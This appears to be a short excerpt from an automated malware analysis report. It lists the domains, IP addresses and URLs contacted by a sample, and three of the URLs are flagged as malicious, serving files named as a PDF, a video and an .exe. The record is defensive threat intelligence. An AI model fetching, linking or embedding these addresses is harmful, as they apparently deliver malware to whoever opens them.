 1.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farm Russian Federation
30968 INFOBOX-ASInfoboxruAutonomousSystemRU false

Contacted Domains

Name IP Active
f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farm 188.114.96.3 true
1.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farm 77.221.140.76 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farm/don2-m/Dllzeadr.pdf true
  • Avira URL Cloud: safe
 unknown
https://f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farm/don2/Qlxywcbxa.mp4 true
  • Avira URL Cloud: safe
 unknown
https://f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farm/don2-m/kr/Wudbiu.exe true
  • Avira URL Cloud: safe
 unknown